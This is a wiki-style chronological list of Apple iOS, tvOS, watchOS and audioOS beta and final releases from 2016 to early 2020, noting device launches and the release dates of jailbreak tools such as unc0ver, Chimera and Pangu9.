* 26 February -- iOS/iPadOS 13.4 beta 3, tvOS 13.4 beta 3 and watchOS 6.2 beta 3 released.
* 25 February -- [[unc0ver]] updated to support A8-A11 devices running iOS/iPadOS 13.0-13.3.
* 19 February -- iOS/iPadOS 13.4 beta 2, tvOS 13.4 beta 2 and watchOS 6.2 beta 2 released.
* 18 February -- watchOS 5.3.5 released.
* 15 February -- [[unc0ver]] updated to support A12 and A13 devices running iOS/iPadOS 13.0-13.3.
* 5 February -- iOS/iPadOS 13.4 beta, tvOS 13.4 beta and watchOS 6.2 beta released.

=== January ===
* 28 January -- iOS/iPadOS 13.3.1, tvOS 13.3.1, watchOS 6.1.2 and iOS 12.4.5 released.
* 22 January -- iOS/iPadOS 13.3.1 beta 3, tvOS 13.3.1 beta 3 and watchOS 6.1.2 beta 3 released.
* 17 January -- iOS/iPadOS 13.3.1 beta 2, tvOS 13.3.1 beta 2 and watchOS 6.1.2 beta 2 released.

== 2019 ==
=== December ===
* 17 December -- iOS/iPadOS 13.3.1 beta, tvOS 13.3.1 beta and watchOS 6.1.2 beta released.
* 10 December -- audioOS 13.3, iOS/iPadOS 13.3, tvOS 13.3 and watchOS 6.1.1 released
* 5 December -- iOS/iPadOS 13.3 beta 4, tvOS 13.3 beta 4 and watchOS 6.1.1 beta 4 released.

=== November ===
* 20 November -- iOS/iPadOS 13.3 beta 3, tvOS 13.3 beta 3 and watchOS 6.1.1 beta 3 released.
* 18 November -- iOS/iPadOS 13.2.3 released.
* 12 November -- iOS/iPadOS 13.3 beta 2, tvOS 13.3 beta 2 and watchOS 6.1.1 beta 2 released.
* 10 November -- [[checkra1n]] beta 0.9 released.
* 7 November -- iOS/iPadOS 13.2.2 released.
* 5 November -- iOS/iPadOS 13.3 beta, tvOS 13.3 beta and watchOS 6.1.1 beta released.

=== October ===
* 30 October -- audioOS 13.2.1 released.
* 29 October -- watchOS 5.3.3 and 6.1 released.
* 28 October -- iOS/iPadOS 13.2, iOS 12.4.3, audioOS 13.2 and tvOS 13.2 released.
* 23 October -- iOS/iPadOS 13.2 beta 4, watchOS 6.1 beta 5 and tvOS 13.2 beta 4 released.
* 16 October -- iOS/iPadOS 13.2 beta 3, watchOS 6.1 beta 4 and tvOS 13.2 beta 3 released.
* 15 October -- iOS/iPadOS 13.1.3 released.
* 10 October -- iOS/iPadOS 13.2 beta 2, watchOS 6.1 beta 3 and tvOS 13.2 beta 2 released.
* 9 October -- watchOS 5.3.2 for [[Apple Watch Series 4]] released.
* 7 October -- [[bridgeOS]] 4.0 released.
* 2 October -- iOS/iPadOS 13.2 beta, watchOS 6.1 beta 2 and tvOS 13.2 beta released.

=== September ===
* 30 September -- iOS/iPadOS 13.1.2, watchOS 6.0.1, and watchOS 5.3.2 for [[Apple Watch Series 3]] released.
* 27 September -- iOS/iPadOS 13.1.1 released.
* 26 September -- iOS 12.4.2 for [[iPad Air]], [[iPad mini 2]], [[iPad mini 3]], [[iPhone 5s]], [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[N102AP|iPod touch (6th generation)]], and watchOS 5.3.2 for [[Apple Watch Series 1]] and [[Apple Watch Series 2]] released.
* 24 September -- iOS/iPadOS 13.1 and tvOS 13.0 released.
* 23 September -- watchOS 6.1 beta released.
* 22 September -- [[unc0ver]] updated to v3.7.0b1 with iOS 12.0-12.4 support (excluding iOS 12.3-12.3.1) for A12/A12X devices.
* 20 September -- [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]] available to purchase. tvOS 13 beta 11 renamed to [[Golden Master|GM]].
* 19 September -- iOS 13.0 for [[List of iPhones|iPhones]] and watchOS 6.0 released.
* 18 September -- iOS/iPadOS 13.1 beta 4 and tvOS 13.0 beta 11 released.
* 13 September -- [[N104AP|iPhone 11]], [[D421AP|iPhone 11 Pro]], and [[D431AP|iPhone 11 Pro Max]] available for pre-order.
* 11 September -- watchOS 6.0 [[Golden Master|GM]] released.
* 10 September -- '''By Innovation Only 2019''' event announcing [[Apple Watch Series 5]], [[iPad (7th generation)]], [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]]. iOS/iPadOS 13.1 beta 3, tvOS 13.0 beta 10, and iOS 13.0 [[Golden Master|GM]] (excluding iPod touch) released.
* 4 September -- iOS/iPadOS 13.1 beta 2 and tvOS 13.0 beta 9 released.

=== August ===
* 27 August -- iOS/iPadOS 13.1 beta, tvOS 13.0 beta 8 and watchOS 6.0 beta 9 released.
* 26 August -- iOS 12.4.1, tvOS 12.4.1, and watchOS 5.3.1 released.
* 21 August -- iOS/iPadOS 13.0 beta 8 and watchOS 6.0 beta 8 released. [[Chimera|ChimeraTV]] updated to support tvOS 12.4.
* 19 August -- [[Chimera]] updated to 1.2.8 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for A9-A11 devices.
* 18 August -- [[unc0ver]] updated to v3.5.0 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for non A12 devices.
* 15 August -- iOS/iPadOS 13.0 beta 7, tvOS 13.0 beta 7 and watchOS 6.0 beta 7 released.
* 7 August -- iOS/iPadOS 13.0 beta 6, tvOS 13.0 beta 6 and watchOS 6.0 beta 6 released.

=== July ===
* 30 July -- watchOS 6.0 beta 5 released.
* 29 July -- iOS/iPadOS 13.0 beta 5 and tvOS 13.0 beta 5 released.
* 22 July -- iOS 12.4, iOS 10.3.4 for [[iPad (4th generation)]] and [[iPhone 5]], iOS 9.3.6 for [[K95AP|iPad2,3]], [[iPad mini|iPad2,6 iPad2,7]] [[iPad (3rd generation)|iPad3,2 iPad3,3]] and [[N94AP|iPhone 4s]], tvOS 12.4, watchOS 5.3, audioOS 12.4, and iBridge 3.6 released.
* 17 July -- iOS/iPadOS 13.0 beta 4, tvOS 13.0 beta 4 and watchOS 6.0 beta 4 released.
* 16 July -- iOS 12.4 beta 7, and watchOS 5.3 beta 6 released.
* 14 July -- [[Chimera]] updated to 1.2.3 to include support for some iOS 12.3 betas on A9-A11 devices. It was also updated to 1.2.2 for Apple TV 4K support up to tvOS 12.2.
* 12 July -- [[Chimera]] updated to 1.2.0 to include support for iOS 12.1.3-12.2 on A9-A11 devices.
* 11 July -- [[unc0ver]] updated to v3.3.0~b1 to include support for iOS 12.1.3-12.2 on A7-A11 devices.
* 9 July -- iOS 12.4 beta 6 and watchOS 5.3 beta 5 released.
* 8 July -- iOS/iPadOS 13.0 beta 3 (17A5522g) released.
* 2 July -- iOS/iPadOS 13.0 beta 3 (17A5522f), tvOS 13.0 beta 3 and watchOS 6.0 beta 3 released.

=== June ===
* 24 June -- iOS 12.4 beta 5 and watchOS 5.3 beta 4 released.
* 17 June -- iOS/iPadOS 13.0 beta 2, tvOS 13.0 beta 2 and watchOS 6.0 beta 2 released.
* 11 June -- iOS 12.4 beta 4, tvOS 12.4 beta 3 and watchOS 5.3 beta 3 released.
* 10 June -- iOS 12.3.2 for [[iPhone 8 Plus]] released.
* 3 June -- [[WWDC]] 2019. iOS/iPadOS 13.0 beta, tvOS 13.0 beta and watchOS 6.0 beta released.

=== May ===
* 29 May -- iOS 12.3.1 (16F8202) IPSW released for [[N112AP|iPod touch (7th generation)]].
* 28 May -- [[N112AP|iPod touch (7th generation)]] announced and available to order. iOS 12.3.1 (16F8202) OTA released for it. iOS 12.4 beta 3, tvOS 12.4 beta 2, and watchOS 5.3 beta 2 released.
* 24 May -- iOS 12.3.1 released.
* 20 May -- iOS 12.4 beta 2 released.
* 15 May -- iOS 12.4 beta, tvOS 12.4 beta and watchOS 5.3 beta released.
* 13 May -- iOS 12.3, tvOS 12.3, watchOS 5.2.1, audioOS 12.3 and Apple TV Software 7.3 released.
* 10 May -- iOS 12.3 beta 6 released.
* 7 May -- iOS 12.3 beta 5, tvOS 12.3 beta 5, Apple TV Software 7.3 beta 4 and watchOS 5.2.1 beta 5 released.

=== April ===
* 30 April -- [[Chimera]] jailbreak for all devices running iOS 12.0-12.1.2 and tvOS 12.0-12.1.1 released.
* 29 April -- iOS 12.3 beta 4, tvOS 12.3 beta 4, Apple TV Software 7.3 beta 3 and watchOS 5.2.1 beta 4 released.
* 22 April -- iOS 12.3 beta 3, tvOS 12.3 beta 3, Apple TV Software 7.3 beta 2 and watchOS 5.2.1 beta 3 released.
* 10 April -- tvOS 12.2.1 released.
* 8 April -- iOS 12.3 beta 2, tvOS 12.3 beta 2 and watchOS 5.2.1 beta 2 released.

=== March ===
* 28 March -- watchOS 5.2.1 beta released.
* 27 March -- iOS 12.3 beta, tvOS 12.3 beta, Apple TV Software 7.3 beta and watchOS 5.2 released.
* 25 March -- iOS 12.2, tvOS 12.2 and audioOS 12.2 released.
* 20 March -- [[AirPods (2nd generation)]] revealed.
* 18 March -- [[iPad Air (3rd generation)]] and [[iPad mini (5th generation)]] revealed. iOS 12.2 beta 6, tvOS 12.2 beta 6 and watchOS 5.2 beta 6 released.
* 11 March -- iOS 12.2 beta 5, tvOS 12.2 beta 5 and watchOS 5.2 beta 5 released.
* 4 March -- iOS 12.2 beta 4, tvOS 12.2 beta 4 and watchOS 5.2 beta 4 released.

=== February ===
* 20 February -- [[Electra]] updated to support jailbreaking tvOS 11.0-11.4.1.
* 19 February -- iOS 12.2 beta 3, tvOS 12.2 beta 3 and watchOS 5.2 beta 3 released.
* 7 February -- iOS 12.1.4 released.
* 4 February -- iOS 12.2 beta 2, tvOS 12.2 beta 2 and watchOS 5.2 beta 2 released.

=== January ===
* 30 January -- [[Electra]] and [[unc0ver]] updated to support jailbreaking iOS 11.4 and 11.4.1.
* 24 January -- iOS 12.2 beta, tvOS 12.2 beta and watchOS 5.2 beta released.
* 22 January -- iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3 and audioOS 12.1.3 released.
* 10 January -- iOS 12.1.3 beta 4 released.
* 7 January -- iOS 12.1.3 beta 3, tvOS 12.1.2 beta 3 and watchOS 5.1.3 beta 3 released.

== 2018 ==
=== December ===
* 20 December -- iOS 12.1.2 (16C104) released for iPhone.
* 19 December -- iOS 12.1.3 beta 2, tvOS 12.1.2 beta 2 and watchOS 5.1.3 beta 2 released.
* 17 December -- iOS 12.1.2 (16C101) released for iPhone.
* 10 December -- iOS 12.1.2 beta, tvOS 12.1.2 beta, and watchOS 5.1.3 beta released.
* 6 December -- watchOS 5.1.2 released.
* 5 December -- iOS 12.1.1, tvOS 12.1.1 and audioOS 12.1.1 released.

=== November ===
* 29 November -- tvOS 12.1.1 beta 4 released.
* 15 November -- iOS 12.1.1 beta 3, tvOS 12.1.1 beta 3, and watchOS 5.1.2 beta 2 released.
* 7 November -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] available for purchase. iOS 12.1.1 beta 2, tvOS 12.1.1 beta 2, and watchOS 5.1.2 beta released.
* 6 November -- iOS 12.1 (16B94) released for [[N841AP|iPhone XR]].
* 5 November -- watchOS 5.1.1 released.

=== October ===
* 31 October -- iOS 12.1.1 beta and tvOS 12.1.1 beta released.
* 30 October -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] announced and available for pre-order. iOS 12.1, tvOS 12.1 and watchOS 5.1 released.
* 26 October -- [[N841AP|iPhone XR]] available for purchase.
* 22 October -- iOS 12.1 beta 5, tvOS 12.1 beta 5 and watchOS 5.1 beta 5 released.
* 19 October -- [[N841AP|iPhone XR]] available for pre-order.
* 15 October -- iOS 12.1 beta 4, tvOS 12.1 beta 4 and watchOS 5.1 beta 4 released.
* 9 October -- iOS 12.1 beta 3, tvOS 12.1 beta 3 and watchOS 5.1 beta 3 released.
* 8 October -- iOS 12.0.1 released.
* 2 October -- iOS 12.1 beta 2, tvOS 12.1 beta 2 and watchOS 5.1 beta 2 released.

=== September ===
* 27 September -- watchOS 5.0.1 released.
* 24 September -- tvOS 12.0.1 released.
* 21 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for purchase.
* 18 September -- iOS 12.1 beta, tvOS 12.1 beta and watchOS 5.1 beta released.
* 17 September -- audioOS 12.0, iOS 12.0, tvOS 12.0 and watchOS 5.0 released.
* 14 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for pre-order.
* 12 September -- [[Apple Watch Series 4]], [[N841AP|iPhone XR]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] announced. iOS 12.0 [[Golden Master|GM]], tvOS 12.0 [[Golden Master|GM]] and watchOS 5.0 [[Golden Master|GM]] released.

=== August ===
* 31 August -- iOS 12.0 beta 12, tvOS 12.0 beta 10 and watchOS 12.0 beta 10 released.
* 27 August -- iOS 12.0 beta 11 and tvOS 12.0 beta 9 released.
* 24 August -- watchOS 5.0 beta 9 released
* 23 August -- iOS 12.0 beta 10 released.
* 20 August -- iOS 12.0 beta 9, tvOS 12.0 beta 8 and watchOS 5.0 beta 8 released.
* 15 August -- iOS 12.0 beta 8 released.
* 13 August -- iOS 12.0 beta 7, tvOS 12.0 beta 7 and watchOS 5.0 beta 7 released.
* 6 August -- iOS 12.0 beta 6, tvOS 12.0 beta 6 and watchOS 5.0 beta 6 released.

=== July ===
* 30 July -- iOS 12.0 beta 5, tvOS 12.0 beta 5 and watchOS 5.0 beta 5 released.
* 17 July -- iOS 12.0 beta 4, tvOS 12.0 beta 4 and watchOS 5.0 beta 4 released.
* 12 July -- [[Electra|ElectraTV]] released to jailbreak tvOS 11.2-11.3.
* 9 July -- audioOS 11.4.1, iOS 11.4.1, tvOS 11.4.1, and watchOS 4.3.2 released.
* 8 July -- [[backr00m]] released to jailbreak tvOS 10.2.2-11.1.
* 6 July -- [[Electra]] updated to jailbreak iOS 11.2-11.3.1.
* 3 July -- iOS 12.0 beta 3, tvOS 12.0 beta 3 and watchOS 5.0 beta 3 released.
* 2 July -- iOS 11.4.1 beta 5 released.

=== June ===
* 25 June -- iOS 11.4.1 beta 4, tvOS 11.4.1 beta 4, and watchOS 4.3.2 beta 3 released.
* 19 June -- iOS 12.0 beta 2, tvOS 12.0 beta 2 and watchOS 5.0 beta 2 released.
* 18 June -- iOS 11.4.1 beta 3 and tvOS 11.4.1 beta 3 released.
* 13 June -- watchOS 4.3.2 beta 2 released.
* 11 June -- iOS 11.4.1 beta 2, tvOS 11.4.1 beta 2, and watchOS 5.0 beta (build 16R5283r) released.
* 4 June -- iOS 12.0 beta, tvOS 12.0 beta and watchOS 5.0 beta (build 16R5283q) released. [[WWDC]] event.

=== May ===
* 30 May -- iOS 11.4.1 beta, tvOS 11.4.1 beta and watchOS 4.3.2 beta released.
* 29 May -- iOS 11.4, tvOS 11.4, watchOS 4.3.1 and audioOS 11.4 released.
* 17 May -- iOS 11.4 beta 6 released.
* 14 May -- iOS 11.4 beta 5, tvOS 11.4 beta 5 and watchOS 4.3.1 beta 5 released.
* 7 May -- iOS 11.4 beta 4, tvOS 11.4 beta 4 and watchOS 4.3.1 beta 4 released.
* 1 May -- iOS 11.4 beta 3, tvOS 11.4 beta 3 and watchOS 4.3.1 beta 3 released.

=== April ===
* 24 April -- iOS 11.3.1 released.
* 16 April -- iOS 11.4 beta 2, tvOS 11.4 beta 2 and watchOS 4.3.1 beta 2 released.
* 2 April -- iOS 11.4 beta, tvOS 11.4 beta and watchOS 4.3.1 beta released.

=== March ===
* 29 March -- audioOS 11.3, iOS 11.3, tvOS 11.3 and watchOS 4.3 released.
* 28 March -- iOS 11.3 for [[iPad (6th generation)]] released.
* 27 March -- [[iPad (6th generation)]] released.
* 20 March -- tvOS 11.3 beta 6 released.
* 16 March -- iOS 11.3 beta 6 and watchOS 4.3 beta 6 released.
* 12 March -- iOS 11.3 beta 5, tvOS 11.3 beta 5 and watchOS 4.3 beta 5 released.
* 6 March -- watchOS 4.3 beta 4 released.
* 5 March -- iOS 11.3 beta 4 and tvOS 11.3 beta 4 released.

=== February ===
* 26 February -- [[Electra]] 1.0 and 1.0.1 released to the public.
* 21 February -- watchOS 4.3 beta 3 released.
* 20 February -- iOS 11.3 beta 3 and tvOS 11.3 beta 3 released.
* 19 February -- iOS 11.2.6, tvOS 11.2.6 and watchOS 4.2.3 released.
* 7 February -- watchOS 4.3 beta 2 released.
* 6 February -- iOS 11.3 beta 2, and tvOS 11.3 beta 2 released.

=== January ===
* 25 January -- watchOS 4.3 beta released.
* 24 January -- iOS 11.3 beta and tvOS 11.3 beta released.
* 23 January -- iOS 11.2.5, tvOS 11.2.5, watchOS 4.2.2 and audioOS 11.2.5 beta 3 released.
* 19 January -- iOS 11.2.5 beta 7 and watchOS 4.2.2 beta 5 released.
* 17 January -- iOS 11.2.5 beta 6 and tvOS 11.2.5 beta 6 released.
* 12 January -- tvOS 11.2.5 beta 5 and [[Electra]] JB toolkit released.
* 11 January -- iOS 11.2.5 beta 5 released.
* 9 January -- iOS 11.2.5 beta 4, watchOS 4.2.2 beta 4 and tvOS 11.2.5 beta 4 released.
* 8 January -- iOS 11.2.2 released.
* 3 January -- iOS 11.2.5 beta 3, watchOS 4.2.2 beta 3 and tvOS 11.2.5 beta 3 released.

== 2017 ==
=== December ===
* 24 December -- [[h3lix]] beta 1 released to jailbreak 32-bit devices running iOS 10.x.
* 19 December -- iOS 11.2.5 beta 2, watchOS 4.2.2 beta 2, audioOS 11.2.5 beta 2 and tvOS 11.2.5 beta 2 released.
* 13 December -- iOS 11.2.1 and tvOS 11.2.1 released. iOS 11.2.5 beta, watchOS 4.2.2 beta, tvOS 11.2.5 beta, and audioOS 11.2.5 beta also released.
* 5 December -- watchOS 4.2 released.
* 4 December -- tvOS 11.2 released.
* 2 December -- iOS 11.2 released.
* 1 December -- iOS 11.2 beta 6 released.

=== November ===
* 28 November -- iOS 11.2 beta 5 and tvOS 11.2 beta 5 released.
* 17 November -- iOS 11.2 beta 4, tvOS 11.2 beta 4 and watchOS 11.2 beta 4 released.
* 16 November -- iOS 11.1.2 released.
* 13 November -- iOS 11.2 beta 3, tvOS 11.3 beta 3 and watchOS 4.2 beta 3 released.
* 9 November -- iOS 11.1.1 released.
* 6 November -- iOS 11.2 beta 2, tvOS 11.2 beta 2, watchOS 4.2 beta 2 and [[audioOS]] 11.2 beta 2 released.
* 3 November -- iPhone X released. iOS 11.2 beta 2 for [[iPhone X]] released.

=== October ===
* 31 October -- iOS 11.1, tvOS 11.1 and watchOS 4.1 released.
* 30 October -- iOS 11.2 beta, tvOS 11.2 beta, watchOS 4.2 beta and [[audioOS]] 11.2 beta released.
* 23 October -- iOS 11.1 beta 5 and tvOS 11.1 beta 4 released.
* 20 October -- iOS 11.1 beta 4 and watchOS 4.1 beta 4 released.
* 16 October -- iOS 11.1 beta 3, tvOS 11.1 beta 3 and watchOS 4.1 beta 3 released.
* 15 October -- [[Saïgon]] jailbreak released in beta.
* 11 October -- iOS 11.0.3 released.
* 9 October -- iOS 11.1 beta 2, tvOS 11.1 beta 2 and watchOS 4.1 beta 2 released.
* 4 October -- watchOS 4.0.1 released.
* 3 October -- iOS 11.0.2 released.

=== September ===
* 27 September -- iOS 11.1 beta, tvOS 11.1 beta and watchOS 4.1 beta released.
* 26 September -- iOS 11.0.1 released.
* 22 September -- [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], and [[iPhone 8 Plus]] released.
* 19 September -- iOS 11.0, tvOS 11.0 and watchOS 4.0 released. [[EtasonJB]] released for iOS 8.4.1.
* 12 September -- iOS 11.0 [[Golden Master|GM]], tvOS 11.0 [[Golden Master|GM]] and watchOS 4.0 [[Golden Master|GM]] released. [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], [[iPhone 8 Plus]] and [[iPhone X]] announced.
* 6 September -- iOS 11.0 beta 10 released.
* 5 September -- tvOS 11.0 beta 10 released.

=== August ===
* 31 August -- iOS 11.0 beta 9 and tvOS 11.0 beta 9 released.
* 28 August -- iOS 11.0 beta 8, tvOS 11.0 beta 8 and watchOS 4.0 beta 8 released.
* 21 August -- iOS 11.0 beta 7, tvOS 11.0 beta 7 and watchOS 4.0 beta 7 released.
* 14 August -- iOS 11.0 beta 6, tvOS 11.0 beta 6 and watchOS 4.0 beta 6 released.
* 7 August -- iOS 11.0 beta 5, tvOS 11.0 beta 5 and watchOS 4.0 beta 5 released.

=== July ===
* 24 July -- iOS 11.0 beta 4, tvOS 11.0 beta 4 and watchOS 4.0 beta 4 released.
* 19 July -- iOS 10.3.3, tvOS 10.2.2 and watchOS 3.2.3 released.
* 13 July -- watchOS 4.0 beta 3 released.
* 10 July -- iOS 11.0 beta 3 and tvOS 11.0 beta 3 released.
* 6 July -- tvOS 10.2.2 beta 5 released.
* 5 July -- iOS 10.3.3 beta 6 released.

=== June ===
* 28 June -- iOS 10.3.3 beta 5 released.
* 26 June -- iOS 11.0 beta 2 (build 15A5304j), tvOS 11.0 beta 2 (build 15J5310h) and watchOS 3.2.3 beta 4 released.
* 22 June -- iOS 10.3.3 beta 4 and tvOS 10.2.2 beta 4 released.
* 21 June -- iOS 11.0 beta 2, tvOS 11.0 beta 2 and watchOS 4.0 beta 2 released.
* 13 June -- iOS 10.3.3 beta 3, tvOS 10.2.2 beta 3 and watchOS 3.2.3 beta 3 released.
* 7 June -- tvOS 11.0 beta (build 15J5284g) released.
* 5 June -- iOS 11.0 beta, tvOS 11.0 beta (build 15J5284e), watchOS 4.0 beta and iOS 10.3.2 for [[iPad Pro (12.9-inch) (2nd generation)]] and [[iPad Pro (10.5-inch)]] released.

=== May ===
* 30 May -- iOS 10.3.3 beta 2, tvOS 10.2.2 beta 2 and watchOS 3.2.3 beta 2 released.
* 16 May -- iOS 10.3.3 beta, tvOS 10.2.2 beta and watchOS 3.2.3 beta released.
* 15 May -- iOS 10.3.2, tvOS 10.2.1 and watchOS 3.2.2 released.
* 4 May -- tvOS 10.2.1 beta 5 released.

=== April ===
* 27 April -- iOS 10.3.2 beta 5 released.
* 24 April -- iOS 10.3.2 beta 4, watchOS 3.2.2 beta 4 and tvOS 10.2.1 beta 4 released.
* 17 April -- iOS 10.3.2 beta 3, watchOS 3.2.2 beta 3 and tvOS 10.2.1 beta 2 released.
* 11 April -- [[alloc8 Exploit]] released for all revisions of the [[iPhone 3GS]], along with [[ipwndfu]] as a tool to utilise this exploit.
* 10 April -- iOS 10.3.2 beta 2, watchOS 3.2.2 beta 2 and tvOS 10.2.1 beta 2 released.
* 3 April -- iOS 10.3.1 released.

=== March ===
* 28 March -- iOS 10.3.2 beta, watchOS 3.2.2 beta and tvOS 10.2.1 beta released.
* 27 March -- iOS 10.3, watchOS 3.2 and tvOS 10.2 released.
* 24 March -- [[iPad (5th generation)]], 32GB/128GB [[iPhone SE (1st generation)]] and PRODUCT(RED) [[iPhone 7]] available for purchase.
* 21 March -- [[iPad (5th generation)]] and iPhone 7 (PRODUCT)RED Special Edition announced.
* 20 March -- watchOS 3.2 beta 7 released.
* 16 March -- iOS 10.3 beta 7 released.
* 14 March -- tvOS 10.2 beta 6 and watchOS 3.2 beta 6 released.
* 13 March -- iOS 10.3 beta 6 released.
* 8 March -- iOS 10.3 beta 5, tvOS 10.2 beta 5 and watchOS 3.2 beta 5 released.

=== February ===
* 28 February -- tvOS 10.2 beta 4 released.
* 27 February -- iOS 10.3 beta 4 and watchOS 3.2 beta 4 released.
* 20 February -- iOS 10.3 beta 3, tvOS 10.2 beta 3 and watchOS 3.2 beta 3 released.
* 6 February -- iOS 10.3 beta 2, tvOS 10.2 beta 2 and watchOS 3.2 beta 2 released.

=== January ===
* 30 January -- watchOS 3.2 beta released.
* 24 January -- iOS 10.3 beta and tvOS 10.2 beta released.
* 23 January -- iOS 10.2.1, watchOS 3.1.3 and tvOS 10.1.1 released.
* 12 January -- iOS 10.2.1 beta 4 released.
* 9 January -- iOS 10.2.1 beta 3, watchOS 3.1.3 beta 2 and tvOS 10.1.1 beta 2 released.

== 2016 ==
=== December ===
* 21 December -- watchOS 3.1.3 beta released.
* 20 December -- iOS 10.2.1 beta 2 released.
* 14 December -- iOS 10.2.1 beta and tvOS 10.1.1 beta released.
* 13 December -- watchOS 3.1.1 retracted after reports of [[Apple Watch Series 2]] units bring bricked.
* 12 December -- iOS 10.2, tvOS 10.1, watchOS 3.1.1 and Apple TV iOS 7.2.2 released.
* 7 December -- iOS 10.2 beta 7 released. [[User:qwertyoruiop|qwertyoruiop]] releases [https://jbme.qwertyoruiop.com/ jbme] to re-enable the [[Pangu9]] jailbreak for iOS 9.3.3, as an alternative to the IPA.
* 6 December -- tvOS 10.1 beta 5 released.
* 5 December -- iOS 10.2 beta 6 and watchOS 3.1.1 beta 5 released.
* 2 December -- iOS 10.2 beta 5 released.

=== November ===
* 30 November -- tvOS 10.1 beta 4 released.
* 28 November -- iOS 10.2 beta 4 and watchOS 3.1.1 beta 4 released.
* 15 November -- watchOS 3.1.1 beta 3 released.
* 14 November -- iOS 10.2 beta 3, tvOS 10.1 beta 3 and 10.0.1 released.
* 9 November -- iOS 10.1.1 (14B150) released via IPSW's only.
* 7 November -- iOS 10.2 beta 2, tvOS 10.1 beta 2 and watchOS 3.1.1 beta 2 released.

=== October ===
* 31 October -- iOS 10.1.1, 10.2 beta, tvOS 10.1 beta and watchOS 3.1.1 beta released.
* 24 October -- iOS 10.1, tvOS 10.0.1 and watchOS 3.1 released.
* 20 October -- tvOS 10.0.1 beta 4 released.
* 19 October -- iOS 10.1 beta 5 for [[iPhone 7]] and [[iPhone 7 Plus]] released.
* 17 October -- iOS 10.0.3 for [[iPhone 7]] and [[iPhone 7 Plus]] and iOS 10.1 beta 4 released.
* 12 October -- watchOS 3.1 beta 3 released.
* 10 October -- iOS 10.1 beta 3 and tvOS 10.0.1 beta 3 released.
* 4 October -- iOS 10.1 beta 2, tvOS 10.0.1 beta 2 and watchOS 3.1 beta 2 released.

=== September ===
* 23 September -- iOS 10.0.2 released.
* 21 September -- iOS 10.1 beta, tvOS 10.0.1 beta and watchOS 3.1 beta released.
* 13 September -- iOS 10.0.1, tvOS 10.0 and watchOS 3.0 released.
* 7 September -- iOS 10.0.1 [[Golden Master|GM]], tvOS 10.0 [[Golden Master|GM]] and watchOS 3.0 [[Golden Master|GM]] released. [[Apple Watch Series 1]], [[Apple Watch Series 2]], [[iPhone 7]], [[iPhone 7 Plus]] and [[B188AP|AirPods (1st generation)]] announced.

=== August ===
* 26 August -- iOS 10.0 beta 8 and tvOS 10.0 beta 7 released.
* 25 August -- iOS 9.3.5 released.
* 19 August -- iOS 10.0 beta 7 released.
* 15 August -- iOS 10.0 beta 6, tvOS 10.0 beta 6 and watchOS 3.0 beta 6 released.
* 9 August -- iOS 10.0 beta 5, tvOS 10.0 beta 5 and watchOS 3.0 beta 5 released.
* 4 August -- iOS 9.3.4 released.
* 1 August -- iOS 10.0 beta 4, tvOS 10.0 beta 4 and watchOS 3.0 beta 4 released.

=== July ===
* 29 July -- [[Pangu9]] for iOS 9.2-9.3.3 English version released.
* 24 July -- [[Pangu9]] for iOS 9.2-9.3.3 released.
* 18 July -- iOS 10.0 beta 3, tvOS 10.0 beta 3 and watchOS 3.0 beta 3, iOS 9.3.3, watchOS 2.2.2 and tvOS 9.2.2 released.
* 6 July -- iOS 9.3.3 beta 5 and tvOS 9.2.2 beta 5 released.
* 5 July -- iOS 10.0 beta 2, tvOS 10.0 beta 2 and watchOS 3.0 beta 2 released.

=== June ===
* 29 June -- iOS 9.3.3 beta 4 and tvOS 9.2.2 beta 4 released.
* 21 June -- iOS 9.3.3 beta 3 and tvOS 9.2.2 beta 3 released.
* 13 June -- iOS 10.0 beta, tvOS 10.0 beta and watchOS 3.0 beta released.
* 6 June -- iOS 9.3.3 beta 2, tvOS 9.2.2 beta 2 and watchOS 2.2.2 beta released.
* 2 June -- iOS 9.3.2 (13F72) is released for the [[iPad Pro (9.7-inch)]].

=== May ===
* 23 May -- iOS 9.3.3 beta and tvOS 9.2.2 beta released.
* 19 May -- iOS 9.3.2 is retracted for the [[iPad Pro (9.7-inch)]] due to a bug that may prevent usage, but continues to be [[SHSH|signed]].
* 16 May -- iOS 9.3.2, tvOS 9.2.1 and watchOS 2.2.1 released.
* 3 May -- iOS 9.3.2 beta 4 and tvOS 9.2.1 beta 4 released.

=== April ===
* 27 April -- tvOS 9.2.1 beta 3 released.
* 26 April -- iOS 9.3.2 beta 3 released.
* 21 April -- tvOS 9.2.1 beta 2 re-released.
* 20 April -- iOS 9.3.2 beta 2 and watchOS 2.2.1 beta 2 released. tvOS 9.2.1 beta 2 was also made available, but it was quickly retracted due to a mishap with publishing.
* 6 April -- iOS 9.3.2 beta, watchOS 2.2.1 beta and tvOS 9.2.1 beta released.

=== March ===
* 31 March -- iOS 9.3.1 released.
* 28 March -- iOS 9.3 (13E237) released for iPad 2 ([[K93AP|iPad2,1]], [[K95AP|iPad2,3]], and [[K93AAP|iPad2,4]]), [[iPad (3rd generation)]], [[iPad (4th generation)]], [[iPad Air]], [[iPad mini]], [[iPad mini 2]], [[N94AP|iPhone 4s]], [[iPhone 5]], [[iPhone 5c]], [[iPhone 5s]], [[iPod touch (5th generation)]].
* 25 March -- iOS 9.3 (13E236) released for [[K94AP|iPad 2 (iPad2,2)]].
* 23 March -- Pangu released [[J42dAP|Apple TV HD]] [[tvOS]] 9.0 - 9.0.1 jailbreak (v1.0.0).
* 21 March -- iOS 9.3, tvOS 9.2 and watchOS 2.2 released to the public. [[iPad Pro (9.7-inch)]] and [[iPhone SE (1st generation)]] announced
* 16 March -- Pangu9 1.3.1 (Windows)/1.1.1 (Mac) released to make untether of iOS 9.1 more stable.
* 14 March -- iOS 9.3 beta 7 released.
* 11 March -- Pangu9 1.3.0 (Windows)/1.1.0 (Mac) released to jailbreak 64-bit devices on iOS 9.1.
